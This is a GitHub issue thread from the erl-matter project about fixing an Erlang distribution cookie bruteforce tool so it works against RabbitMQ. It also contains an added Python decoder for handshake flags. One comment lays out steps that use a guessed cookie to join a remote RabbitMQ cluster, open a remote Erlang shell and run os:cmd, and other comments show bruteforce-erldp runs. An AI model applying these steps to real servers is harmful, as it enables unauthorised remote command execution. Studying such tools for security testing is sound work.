
Comments (5)

gteissier commented on August 29, 2024

Erlang distribution protocol has evolved into several versions, and a bitfield of flags announcing supported features is present in the very first message sent by the client.

rabbitmq docker - note that it may be the Erlang VM or rabbitmq - now complains about client not supporting BIG_CREATION. The exact message is:

    <0.1084.0> ** rabbit@56c973cf33ac: Connection attempt from node bruteforce0000@erldp rejected since it cannot handle ["BIG_CREATION"].**

The Erlang distribution documentation defines it, and I have tested both the NSE script and the bruteforce program to use it.

I have also tested shell-erldp.py, but it has failed, probably requiring a more careful analysis about the impacts of announcing the new flag as supported.

I will leave the issue open, but you can pull the latest commit to give a try with bruteforce-erldp.

from erl-matter.
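An added example, not part of the thread or of erl-matter: a decoder for the first handshake frame (`send_name`) that reports which required capability bits the connecting node left out, plus the status reply a rejecting node returns. The flag values are from the Erlang distribution protocol documentation; the sample flag word, the `REQUIRED` list and the frames are constructed for illustration.

```python
import struct

# Subset of the DFLAG_* bits listed in the Erlang distribution protocol docs.
DFLAGS = {
    0x4: "EXTENDED_REFERENCES", 0x10: "FUN_TAGS", 0x80: "NEW_FUN_TAGS",
    0x100: "EXTENDED_PIDS_PORTS", 0x400: "BIT_BINARIES", 0x800: "NEW_FLOATS",
    0x10000: "UTF8_ATOMS", 0x20000: "MAP_TAG", 0x40000: "BIG_CREATION",
    0x1000000: "HANDSHAKE_23",
}

def parse_frame(frame: bytes) -> dict:
    """Decode one handshake frame: 2-byte big-endian length, 1-byte tag, body."""
    if len(frame) < 3:
        raise ValueError("truncated frame")
    (length,) = struct.unpack(">H", frame[:2])
    body = frame[2:]
    if len(body) != length:
        raise ValueError("length prefix does not match payload")
    tag, rest = body[:1], body[1:]
    if tag == b"n" and len(rest) >= 6:    # old send_name: version(2) flags(4) name
        _version, flags = struct.unpack(">HI", rest[:6])
        return {"type": "send_name", "flags": flags, "name": rest[6:].decode("latin-1")}
    if tag == b"N" and len(rest) >= 14:   # new send_name: flags(8) creation(4) nlen(2) name
        flags, _creation, nlen = struct.unpack(">QIH", rest[:14])
        return {"type": "send_name", "flags": flags,
                "name": rest[14:14 + nlen].decode("latin-1")}
    if tag == b"s":                       # status reply, e.g. "ok" or "not_allowed"
        return {"type": "status", "status": rest.decode("latin-1")}
    raise ValueError(f"unexpected tag {tag!r}")

def missing_flags(flags: int, required: list) -> list:
    """Names of the required bits that the peer did not announce."""
    return [DFLAGS.get(bit, hex(bit)) for bit in required if not flags & bit]

def old_send_name(flags: int, name: bytes) -> bytes:
    """Build a constructed sample frame in the old 'n' layout (version 5)."""
    body = b"n" + struct.pack(">HI", 5, flags) + name
    return struct.pack(">H", len(body)) + body

# Constructed samples; the node name is the one quoted in the log line above.
REQUIRED = [0x40000]   # assumption: only BIG_CREATION is checked here
WITHOUT = old_send_name(0x30D94, b"bruteforce0000@erldp")
WITH = old_send_name(0x30D94 | 0x40000, b"bruteforce0000@erldp")
STATUS = b"\x00\x0csnot_allowed"

if __name__ == "__main__":
    for frame in (WITHOUT, WITH, STATUS):
        msg = parse_frame(frame)
        print(msg, missing_flags(msg["flags"], REQUIRED) if "flags" in msg else "")
```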

gteissier commented on August 29, 2024

Hi Michael,

You are absolutely right, and I am confused about the example not being coherent with the usage output. I will fix it.

Now regarding your issue, the message received is snot_allowed.

This message comes earlier than the authentication attempt, so it must be something different than seed and cookie being wrong.

Based on the port you reach, I guess that the remote is a rabbitmq process, so I will try to download the latest rabbitmq container and test against it.

I will give you an update soon.


benichmt1 commented on August 29, 2024

Yes, I was using it against rabbitmq. Thanks for the update - seems to work just fine now. In regards to the shell piece, here was the general flow that I was using to show impact once the cookie has been guessed.

  1. Install rabbitmq-server to provide the CLI tools
    sudo apt install rabbitmq-server -y

  2. Set /etc/hosts
    Xx.xx.xx.xx remote_host_name

  3. Set .erlang_cookie in /root/.erlang.cookie; /var/lib/rabbitmq/.erlang.cookie

    • I had to start and restart the service for this to take effect.
      sudo rabbitmqctl stop_app
      service rabbitmq-server restart

  4. Join cluster of the remote node
    rabbitmqctl join_cluster rabbit@<remote_host_name>

  5. Use the cookie to connect to an erlang shell
    erl -setcookie AAA..........A -sname <new_name> -remsh rabbit@<remote_host_name>

  6. Execute Remote Commands
    os:cmd('hostname').


Cainor commented on August 29, 2024

So, did something change here? Because I'm still facing the same issue:

> ./bruteforce-erldp --threads=1 --seed-start=381410768 --seed-end=386584488 --gap=1000 <IP> <PORT>

./bruteforce-erldp: unrecognized option '--seed-start=381410768'
./bruteforce-erldp: unrecognized option '--seed-end=386584488'
bruteforce using 1 concurrent threads
./bruteforce-erldp: unrecognized option '--seed-start=381410768'
./bruteforce-erldp: unrecognized option '--seed-end=386584488'
Erlang distribution cookie bruteforce is starting, sweeping through 0 seed intervals
Segmentation fault

Even tried the mentioned interval:

> ./bruteforce-erldp --interval=430413359,431413359,6.24 <IP> <PORT>

bruteforce using 64 concurrent threads
creating new interval 430413359 -> 431413359 6.240000
Erlang distribution cookie bruteforce is starting, sweeping through 1 seed intervals
could not read, 'Connection reset by peer'
could not receive send_status
could not read, 'Connection reset by peer'
could not receive send_status
could not read, 'Connection reset by peer'
could not receive send_status
could not receive send_status
could not receive send_status
could not receive send_status
could not receive send_status
could not receive send_status
...
could not receive send_status
could not receive send_status
could not receive send_status
could not receive send_status
 0 seed/s (64 conn/s, 0 fails/s)                0.00000% (1/1)

What did I not do right?

EDIT: Whoops, wrong port :)
Didn't know I have to tackle the rabbit port, instead I was running it on epmd port!


gteissier commented on August 29, 2024

The options no longer work. So use the interval way, and the other problem seems to be gone by now (port issue).
